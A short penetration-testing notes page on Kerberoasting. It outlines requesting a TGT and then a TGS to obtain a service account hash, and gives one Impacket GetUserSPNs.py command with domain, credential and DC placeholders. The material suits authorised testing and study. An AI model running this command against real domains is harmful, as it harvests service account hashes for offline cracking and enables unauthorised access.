https://medium.com/@Shorty420/kerberoasting-9108477279cc
If we have domain creds, we can request a TGT - we get TGT, request TGS - KDC will send back TGS (this is what we need, includes hash of services account)
Last updated 1 month ago
$ python GetUserSPNs.py [domain]/[username]:[password] -dc-ip [dc-ip] -request